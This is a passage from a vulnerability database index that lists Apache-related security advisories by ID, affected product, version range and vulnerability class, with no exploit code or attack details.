4739| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
4740| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
4741| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
4742| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
4743| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
4744| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
4745| [103690] Apache OpenMeetings 1.0.0 sql injection
4746| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
4747| [103688] Apache OpenMeetings 1.0.0 weak encryption
4748| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
4749| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
4750| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
4751| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
4752| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
4753| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
4754| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
4755| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
4756| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
4757| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
4758| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
4759| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
4760| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
4761| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
4762| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
4763| [103352] Apache Solr Node weak authentication
4764| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
4765| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
4766| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
4767| [102697] Apache HTTP Server 2.2.32/2.2.24 HTTP Strict Parsing ap_find_token Request Header memory corruption
4768| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
4769| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
4770| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
4771| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
4772| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
4773| [102536] Apache Ranger up to 0.6 Stored cross site scripting
4774| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
4775| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
4776| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
4777| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
4778| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
4779| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
4780| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
4781| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
4782| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
4783| [101513] Apache jUDDI 3.1.2/3.1.3/3.1.4/3.1. Logout Open Redirect
4784| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
4785| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
4786| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
4787| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
4788| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
4789| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
4790| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
4791| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
4792| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
4793| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
4794| [99937] Apache Batik up to 1.8 privilege escalation
4795| [99936] Apache FOP up to 2.1 privilege escalation
4796| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
4797| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
4798| [99930] Apache Traffic Server up to 6.2.0 denial of service
4799| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
4800| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
4801| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
4802| [117569] Apache Hadoop up to 2.7.3 privilege escalation
4803| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4804| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4805| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4806| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4807| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4808| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4809| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4810| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4811| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4812| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4813| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4814| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4815| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4816| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4817| [98605] Apple macOS up to 10.12.3 Apache denial of service
4818| [98604] Apple macOS up to 10.12.3 Apache denial of service
4819| [98603] Apple macOS up to 10.12.3 Apache denial of service
4820| [98602] Apple macOS up to 10.12.3 Apache denial of service
4821| [98601] Apple macOS up to 10.12.3 Apache denial of service
4822| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4823| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4824| [98199] Apache Camel Validation XML External Entity
4825| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4826| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4827| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4828| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4829| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4830| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4831| [97081] Apache Tomcat HTTPS Request denial of service
4832| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4833| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4834| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4835| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4836| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4837| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4838| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4839| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4840| [95311] Apache storm UI Daemon privilege escalation
4841| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4842| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4843| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4844| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4845| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4846| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4847| [94540] Apache Tika 1.9 tika-server File information disclosure
4848| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4849| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4850| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4851| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4852| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4853| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4854| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4855| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4856| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4857| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4858| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4859| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4860| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4861| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4862| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4863| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4864| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4865| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4866| [93532] Apache Commons Collections Library Java privilege escalation
4867| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4868| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4869| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4870| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4871| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4872| [93098] Apache Commons FileUpload privilege escalation
4873| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4874| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4875| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4876| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4877| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4878| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4879| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4880| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4881| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4882| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4883| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4884| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4885| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4886| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4887| [92549] Apache Tomcat on Red Hat privilege escalation
4888| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4889| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4890| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4891| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4892| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4893| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4894| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4895| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4896| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4897| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4898| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4899| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4900| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4901| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4902| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4903| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4904| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4905| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
4906| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
4907| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
4908| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
4909| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
4910| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
4911| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
4912| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
4913| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
4914| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
4915| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
4916| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
4917| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
4918| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
4919| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
4920| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
4921| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
4922| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
4923| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
4924| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
4925| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
4926| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
4927| [90263] Apache Archiva Header denial of service
4928| [90262] Apache Archiva Deserialize privilege escalation
4929| [90261] Apache Archiva XML DTD Connection privilege escalation
4930| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
4931| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4932| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
4933| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
4934| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4935| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4936| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
4937| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
4938| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
4939| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
4940| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
4941| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
4942| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
4943| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
4944| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
4945| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
4946| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
4947| [87765] Apache James Server 2.3.2 Command privilege escalation
4948| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
4949| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
4950| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
4951| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
4952| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
4953| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
4954| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
4955| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
4956| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
4957| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4958| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4959| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
4960| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
4961| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
4962| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4963| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4964| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
4965| [87172] Adobe ColdFusion up to 10 Update 18/11 Update 7/2016 Apache Commons Collections Library privilege escalation
4966| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
4967| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
4968| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
4969| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
4970| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
4971| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
4972| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
4973| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
4974| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
4975| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
4976| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
4977| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
4978| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
4979| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
4980| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
4981| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
4982| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
4983| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
4984| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
4985| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
4986| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
4987| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
4988| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
4989| [82076] Apache Ranger up to 0.5.1 privilege escalation
4990| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
4991| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
4992| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
4993| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
4994| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
4995| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
4996| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
4997| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
4998| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
4999| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
5000| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
5001| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
5002| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5003| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5004| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
5005| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
5006| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
5007| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
5008| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
5009| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
5010| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
5011| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
5012| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
5013| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
5014| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
5015| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
5016| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
5017| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
5018| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
5019| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
5020| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
5021| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
5022| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
5023| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
5024| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
5025| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
5026| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
5027| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
5028| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
5029| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
5030| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
5031| [79791] Cisco Products Apache Commons Collections Library privilege escalation
5032| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5033| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5034| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
5035| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
5036| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
5037| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
5038| [78989] Apache Ambari up to 2.1.1 Open Redirect
5039| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
5040| [78987] Apache Ambari up to 2.0.x cross site scripting
5041| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
5042| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5043| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5044| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5045| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5046| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5047| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5048| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5049| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
5050| [77406] Apache Flex BlazeDS AMF Message XML External Entity
5051| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
5052| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
5053| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
5054| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
5055| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
5056| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
5057| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
5058| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
5059| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
5060| [76567] Apache Struts 2.3.20 unknown vulnerability
5061| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
5062| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
5063| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
5064| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
5065| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
5066| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
5067| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
5068| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
5069| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
5070| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
5071| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
5072| [74793] Apache Tomcat File Upload denial of service
5073| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
5074| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
5075| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
5076| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
5077| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
5078| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
5079| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
5080| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
5081| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
5082| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
5083| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
5084| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
5085| [74468] Apache Batik up to 1.6 denial of service
5086| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
5087| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
5088| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
5089| [74174] Apache WSS4J up to 2.0.0 privilege escalation
5090| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
5091| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
5092| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
5093| [73731] Apache XML Security unknown vulnerability
5094| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
5095| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
5096| [73593] Apache Traffic Server up to 5.1.0 denial of service
5097| [73511] Apache POI up to 3.10 Deadlock denial of service
5098| [73510] Apache Solr up to 4.3.0 cross site scripting
5099| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
5100| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
5101| [73173] Apache CloudStack Stack-Based unknown vulnerability
